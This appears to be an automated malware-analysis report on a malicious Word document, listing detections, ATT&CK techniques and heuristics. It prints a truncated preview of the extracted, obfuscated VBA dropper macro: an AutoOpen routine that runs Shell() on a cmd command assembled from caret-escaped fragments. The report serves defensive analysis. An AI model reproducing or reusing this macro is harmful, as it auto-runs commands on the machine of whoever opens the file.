MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute an external command or payload. The presence of legacy WordBasic auto-exec markers and the critical Shell() call strongly suggest a dropper or downloader functionality, aiming to fetch and execute a secondary malicious component.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6573547-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6573547-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18234 bytes |
SHA-256: c59419f63683cc0e16499a3221464d44f31e7af14500fc25fd9ac9ed6edbfa17 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "CazNiHiGvDQpcT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function RDNZc()
On Error Resume Next
For bZTbll = jcKSWz To 42353
WQBCb = (wNCaQ - ChrW(94397 * 60850) * YiuqC * CInt(zRpSH + Sqr(90268)) + 20233 - 26940 / 8724 - CDate(hDIRHs - 13146 + 72907 - Hex(YcMQAV / 77082)) + (jEjXj * Tan(FGFbiv)))
Next
For MkIDtN = NtfXID To 57594
nApzTt = (JYbBGC - ChrW(21964 * 3619) * XqFMs * CInt(NHIzn + Sqr(80883)) + 47612 - 16739 / 28181 - CDate(TSTEml - 54524 + 75725 - Hex(bkcrGm / 4818)) + (OzSwRv * Tan(nhpUGl)))
Next
RDNZc = CVmmnAGHQnk + Shell(wXtrWHGPO + Chr(SfoPJraRjdV + vbKeyC + PESEdNrILMj) + ziniZbc + wvpDXX + wtFIfUXGT + lKcVvAn + NaKVdOrB + XfIcazulMCh + wNYUNia, UrOZhF + 0 + NiECHwX)
For PMZnks = fmORbR To 37155
PBMkwK = (wdBXj - ChrW(33357 * 8714) * IhzqUP * CInt(TCKti + Sqr(24842)) + 8737 - 64030 / 82030 - CDate(QBRoHV - 73969 + 50217 - Hex(QvlMI / 61525)) + (qFkbbw * Tan(zhJaE)))
Next
End Function
Sub Autoopen()
On Error Resume Next
For wrvKtT = mHALN To 31123
wWhpC = (HWwwP - ChrW(5254 * 33351) * UGwuhw * CInt(ZAbTo + Sqr(31796)) + 77332 - 67573 / 10432 - CDate(OKkXb - 99957 + 38062 - Hex(qUasz / 91292)) + (CjSACQ * Tan(SDZWGW)))
Next
RDNZc
For zTntY = rjItG To 58357
qdkjA = (cmhViD - ChrW(15093 * 66249) * jzEtzK * CInt(Bnzbuw + Sqr(41877)) + 50993 - 48442 / 89096 - CDate(upoTt - 41462 + 51747 - Hex(bQzEqQ / 35876)) + (zLoNhL * Tan(czjZld)))
Next
End Sub
Attribute VB_Name = "GwnfNtDND"
Function ziniZbc()
On Error Resume Next
For DfSlU = KYroIQ To 57626
iIIksl = (KljdH - ChrW(86843 * 21632) * rYEXO * CInt(VqTUG + Sqr(38607)) + 12024 - 40603 / 62750 - CDate(kLXYz - 761 + 86329 - Hex(Mwtti / 13845)) + (mwAzQ * Tan(tPOIS)))
Next
slBzZT = "md" + " okNiH" + "FhwAmL UZ" + "XfHuVclwPWupz" + "RNUiUD HmZ" + "zVEhQjl" + "C & %^" + "c^o^m^S^p^E^c^%" + " %" + "^c^o^m"
For PmRKpE = twVma To 82608
zKRTcH = (IUVGV - ChrW(31529 * 24854) * vJQfLc * CInt(vlDoQ + Sqr(25767)) + 30876 - 31714 / 23084 - CDate(JlEiw - 89222 + 61287 - Hex(cHSwE / 39677)) + (FDAMWv * Tan(CjPjQn)))
Next
RcipBT = "^S^p^E" + "^c^% " + " " + " /V " + " " + " /c" + " set " + "%CWfKESCP" + "tsVqjRz%=fnRc"
For zsDJjM = IHzOkU To 66863
AwjiA = (KPEpi - ChrW(56475 * 67057) * TRdsT * CInt(POnYIJ + Sqr(94877)) + 90884 - 4795 / 95275 - CDate(awhfQz - 65150 + 76130 - Hex(oczTCi / 93123)) + (oflsBF * Tan(lLIaq)))
Next
BYrkkDwjqJ = "bQvQ" + "thvz&&s" + "et %Va" + "uipzOI%=p&&" + "set %" + "mdOQczzA%=o^w" + "&&set %XDjjlrm" + "jUGIC"
For PNGCD = BtDSvE To 76004
nPTWZM = (HWMuZ - ChrW(83579 * 53168) * FrHwSZ * CInt(tRwCu + Sqr(81277)) + 71012 - 25608 / 78866 - CDate(NQSWsl - 539 + 57517 - Hex(HqtIip / 50207)) + (wboHVO * Tan(WCYXS)))
Next
iSTOwRn = "jEK%=mvqhWXC" + "cOJb" + "l&" + "&set %jX" + "hrnPGZpSU%=!%"
For WJXHL = JXNFHS To 36136
YzJUN = (qmmAf - ChrW(85642 * 4397) * AqNcLc * CInt(hWBSOQ + Sqr(53960)) + 71340 - 41344 / 62925 - CDate(CwzXsE - 19843 + 95433 - Hex(jXWbTY / 30005)) + (WriHq * Tan(rcIBwD)))
Next
UMEVwwd = "VauipzOI" + "%!&&" + "set %" + "bP" + "RWXCrpMl" + "Frf" + "QN%=iPvXGJiz" + "rN&&se" + "t %jiMQEKiDFsj" + "N%=e^r&&set %"
For BQUqq = udzJS To 27104
CKzZzq = (FOdBh - ChrW(22077 * 32055) * ukCLt * CInt(hGCkd + Sqr(36066)) + 41498 - 88448 / 49655 - CDate(Mtvdhc - 66759 + 4721 - Hex(CJnnS / 17226)) + (oliMHG * Tan(dUDzo)))
Next
lutTHBzApc = "OVHtCShYUH%=!%" + "mdOQ" + "czzA%!" + "&&set "
For XfLov = oPmbRB To 99949
qIuTk = (wdkLNa - ChrW(10741 * 47492) * Jdfuj * CInt(XwzrcU + Sqr(28583)) + 3840 - 19276 / 32088 - CDate(HDdVa - 69600 + 24089 - Hex(Xtvza / 40110)) + (PzdzlH * Tan(STJub)))
Next
wtPVmV = "%BupGoSYGAGiZ" + "R%=s&" + "&set %dA" + "BDVbQ" + "BIEo" + "liiM%=ZApwCF" + "Jdww&&"
ziniZbc = slBzZT + RcipBT + BYrkkDwjqJ + iSTOwRn + UMEVwwd + l
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.